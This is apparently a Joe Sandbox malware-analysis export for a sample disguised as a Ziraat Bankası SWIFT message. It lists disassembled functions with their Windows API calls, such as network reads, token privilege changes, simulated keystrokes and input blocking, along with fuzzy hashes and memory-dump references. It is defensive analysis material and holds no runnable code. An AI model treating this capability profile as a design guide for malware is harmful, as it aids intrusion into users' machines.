Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 5b4d38bb00b542801112c6aff698986607ea38ed41636f99d1cf8c64ccb170cf
Instruction ID: ec2df0e7300e85f33deb4e6ac4bacbcad0b73c7ef3641cf1703b405adec8bc26
Opcode Fuzzy Hash: 5b4d38bb00b542801112c6aff698986607ea38ed41636f99d1cf8c64ccb170cf
Instruction Fuzzy Hash: 24D0A731410712EFD7315F60FC096D276F4EB01301F184419E891D2A90E7B4C8D58650

Function 000E13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 000E13DC

Strings

|, xrefs: 000E140C
(, xrefs: 000E1422

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 494dfbcf13fbf2f8aab1de728c39442044871813672378e6214ae29c403e222d
Instruction ID: d01279cffd9e2501316ac2b09c95026745269a4eef182b94d2cf14d52df339b3
Opcode Fuzzy Hash: 494dfbcf13fbf2f8aab1de728c39442044871813672378e6214ae29c403e222d
Instruction Fuzzy Hash: 983215B5A00645DFC728CF69C4809AAB7F0FF48310B15C56EE59AEB3A2E770E941CB44

Function 000BB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 000BB22F

Part of subcall function 000BB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 000BB5A5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 91fcca2d82438dc3d59fa2dc756afd532dba2f643242ed80f319081699f9151d
Instruction ID: e160696612cb833bc082daaeaca3691c15a4875ef83232978c6dbb73aab7c2f7
Opcode Fuzzy Hash: 91fcca2d82438dc3d59fa2dc756afd532dba2f643242ed80f319081699f9151d
Instruction Fuzzy Hash: 95A18670114004BBDB3CAF6A9C89EFF39ECEB56740B04412DF942D2A82CBE58D81D272

Function 000F4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000F43BF,00000000), ref: 000F4FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 000F4FD2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 482074b55f9c1f3688bd30c762fcd44d9491bc1c7b384666356a7f34c6037bca
Instruction ID: 8196fd466ef40bffcb8f140c12976c711accdd3d35f108a5a25e5c58524971b1
Opcode Fuzzy Hash: 482074b55f9c1f3688bd30c762fcd44d9491bc1c7b384666356a7f34c6037bca
Instruction Fuzzy Hash: 2E41D67150460DBFEB209E84DC85FBF77FCEB40769F10402EF70566581EA719E45A6A0

Function 000EE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000EE20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000EE267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 000EE2B4

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 2bfc1a777349ad90c867a9b54f2d33f81b3618d267cbbc3095fc7a094de4541c
Instruction ID: dca203c2d3ad13bae8a8f00dfc64cbcfba1fb72d3f22a76783a04541b04fc9b9
Opcode Fuzzy Hash: 2bfc1a777349ad90c867a9b54f2d33f81b3618d267cbbc3095fc7a094de4541c
Instruction Fuzzy Hash: 69216035A00118EFCB00DFA5D885EEDFBB8FF49310F0484A9E905AB352DB319955CB50

Function 000DB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 000BF4EA: std::exception::exception.LIBCMT ref: 000BF51E
Part of subcall function 000BF4EA: __CxxThrowException@8.LIBCMT ref: 000BF533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000DB180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000DB1AD
GetLastError.KERNEL32 ref: 000DB1BA

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: b3c5cf7e526e3c35bc41d845db22b9e6cba569f58a93f5bffb69cb824cb7e6d3
Instruction ID: 328cb8fa1457a479a5582934d590f58a1751c3dd246ece8cdf84d2e89eb64221
Opcode Fuzzy Hash: b3c5cf7e526e3c35bc41d845db22b9e6cba569f58a93f5bffb69cb824cb7e6d3
Instruction Fuzzy Hash: B311BCB2400305EFE728AF64EC85D6BB7BCFB44310B21852EF05693251DB70FC428A60

Function 000E6606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000E6623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 000E6664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 000E666F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 440e18e71f448f0b34c22a1b3cd9dcebbb0848341cb7c8f2e5aad07056946d66
Instruction ID: 046c9056ca239251ce1727d7f7a9c3c19eaa92bfc6edb818ad1589f8f011f635
Opcode Fuzzy Hash: 440e18e71f448f0b34c22a1b3cd9dcebbb0848341cb7c8f2e5aad07056946d66
Instruction Fuzzy Hash: 5C111EB1E11228BFDB108FA5EC45BAEBBFCEB45B50F104156F900F7290D7B15A058BA5

Function 000E71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000E7223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000E723A
FreeSid.ADVAPI32(?), ref: 000E724A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 8e7af8201f8ba5ac045118e792e5813f5ec7ded2da43de7c1b9f48df67cf7fd3
Instruction ID: 29790ff96b3081618f5f519e11dc5f5492976fd3c49643b97287d87486edcf08
Opcode Fuzzy Hash: 8e7af8201f8ba5ac045118e792e5813f5ec7ded2da43de7c1b9f48df67cf7fd3
Instruction Fuzzy Hash: 91F01D76A04209BFDF04DFE4DD89AEEBBB8EF08201F104469B602E2591E2709A558B54

Function 000EF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000EF599
FindClose.KERNEL32(00000000), ref: 000EF5C9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ee47fcbeb19e90ea4b35b76b2600b0b824758af7dc53beac6415867789e207a3
Instruction ID: 40131949eaa6fba481e1d12913653f5e8b93d5b68574c926308571cd5fc6ad3a
Opcode Fuzzy Hash: ee47fcbeb19e90ea4b35b76b2600b0b824758af7dc53beac6415867789e207a3
Instruction Fuzzy Hash: B91180726006019FDB10EF29D845A6EF7E9FF95324F00896EF9A9D7291DB30AD118B81

Function 000ECE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,000FBE6A,?,?,00000000,?), ref: 000ECEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,000FBE6A,?,?,00000000,?), ref: 000ECEB9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 1fba52de3dba64f9a1acd4f01dcd49a0cefd78cf0ed0374b58416740fae73ad7
Instruction ID: 2c71747625695513e5695b9ec4f165320738cacb391a19ab37fa4d62077dd0dc
Opcode Fuzzy Hash: 1fba52de3dba64f9a1acd4f01dcd49a0cefd78cf0ed0374b58416740fae73ad7
Instruction Fuzzy Hash: B9F08271100229FBEB309BA4DC49FFA776DBF09351F004165F915E6181D7309A55CBA1

Function 000E411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000E4153
keybd_event.USER32(?,753DC0D0,?,00000000), ref: 000E4166

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: cd7b110faba7753fddb3d56a267340e405dd697381127200eff6697a3b2fce52
Instruction ID: e606415b455e2bc750c84fa6f7c48aff21e01552ab976fa0e1f13cd476b83720
Opcode Fuzzy Hash: cd7b110faba7753fddb3d56a267340e405dd697381127200eff6697a3b2fce52
Instruction Fuzzy Hash: E8F0677080028DAFDF158FA1C805BBE7BB0EF00305F00804AF966A6192D7B986529FA0

Function 000DAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000DACC0), ref: 000DAB99
CloseHandle.KERNEL32(?,?,000DACC0), ref: 000DABAB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 0a8b96f4c0e462d31f05e80f34d97fc509b64c6696e5c501c80122bad0e60e07
Instruction ID: 695561c0c8aa9dd77e1f09fe5c0c9435389ae441dd9a011e09dee3d3ddbaa6c0
Opcode Fuzzy Hash: 0a8b96f4c0e462d31f05e80f34d97fc509b64c6696e5c501c80122bad0e60e07
Instruction Fuzzy Hash: D8E0BF71000A11AFE7752F54FC05DB777E9EB043217108429B55981871DB725CD19B50

Function 000C81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,000C6DB3,-0000031A,?,?,00000001), ref: 000C81B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000C81BA

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0b76183e99c8a2b637659fc96bb39a4723a4b928c52191fc3d95bdf231390e5a
Instruction ID: 6f49262b9bcd202594bdc1d0709a05a0c5c4816856f1e227cd5de922a6e586fc
Opcode Fuzzy Hash: 0b76183e99c8a2b637659fc96bb39a4723a4b928c52191fc3d95bdf231390e5a
Instruction Fuzzy Hash: 78B092B1044608BBEB106BA1FC0AB587F68FB08652F104010F60D84861CB7254A28A92

Function 000A77B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000A7921

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: ee4495d3c5a29eadc9fa555e84b35bb903bceb29c8ff5accc893493b19647d11
Instruction ID: c4342d8fce287f96ee57c32e522277d3c47ef8506c7bf3fa227e3463c44de7af
Opcode Fuzzy Hash: ee4495d3c5a29eadc9fa555e84b35bb903bceb29c8ff5accc893493b19647d11
Instruction Fuzzy Hash: 7CA24B75E04219DFCB24CF98C8807ADBBB1FF59314F2581A9E859AB391D7349E81CB90

Function 000B3B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 000B4176

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: 3f368d62abde64c75da4836aa3a15c9e263817a68a36d0d2442cf5630b43ef84
Instruction ID: e57b77df7d25b2ce663d7d035dddcb8a479dca09e54eb78eddadcb19e9f57a00
Opcode Fuzzy Hash: 3f368d62abde64c75da4836aa3a15c9e263817a68a36d0d2442cf5630b43ef84
Instruction Fuzzy Hash: 11728F74D042099FDF24DF94C481AFEB7B5EF48300F24806AE915AB392D771AE85CB91

Function 000CD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d40d5c0fda15bd05eba7db3e41f7c8c85310a0a5ddeddc11c05288e6318f6ca
Instruction ID: b36b6c089f9b7bd665c1db416fced8552ea83483eb7bb1885902a92038fed851
Opcode Fuzzy Hash: 3d40d5c0fda15bd05eba7db3e41f7c8c85310a0a5ddeddc11c05288e6318f6ca
Instruction Fuzzy Hash: 3D32D132D29F014DD763A634D862329A299AFB73D4F15D73BE819B5DAAEB39C4C34100

Function 000A96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: dd117eb4dd8fe8eae9bced4305b22a93c08b396a2352fa1a69477e6219d7f2a5
Instruction ID: 660fb0231c683de7ed103d3813995dc90bb591218ab8b2b4eb2b9331e25030fe
Opcode Fuzzy Hash: dd117eb4dd8fe8eae9bced4305b22a93c08b396a2352fa1a69477e6219d7f2a5
Instruction Fuzzy Hash: C222BD716083019FD728DF54C891BAFB7E4BF85310F10492EF89A9B292DB71E944CB92

Function 000D038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b963b1256346b9d1de20b9b293a6cb8edd86d7a42b18b071a2e2e185795924
Instruction ID: 988f856f9e6bedca5f11a0e0cf39c2ddd9a856917484b7244ce5cf1ff4186994
Opcode Fuzzy Hash: 60b963b1256346b9d1de20b9b293a6cb8edd86d7a42b18b071a2e2e185795924
Instruction Fuzzy Hash: 26B10320D2AF414DD32396398971336B65DAFBB6D5F91D71BFC2A74E22EB2285C34180

Function 000EB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 000EB6DF

Part of subcall function 000C344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,000EBDC3,00000000,?,?,?,?,000EBF70,00000000,?), ref: 000C3453
Part of subcall function 000C344A: __aulldiv.LIBCMT ref: 000C3473

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: dc0647f7d26aae7d6221ab45835e1dadf50f177b27bad6035794bf81c17fbf49
Instruction ID: eb59771fcc42fe31218326be2e343cb848db2b1d54350d84d63ae3804a32e871
Opcode Fuzzy Hash: dc0647f7d26aae7d6221ab45835e1dadf50f177b27bad6035794bf81c17fbf49
Instruction Fuzzy Hash: 1C21AF72634510CFC729CF39C881A92B7E1EB95311B248E6DE0E5CB2C0CB78BA45DB54

Function 000F6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 000F6ACA

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
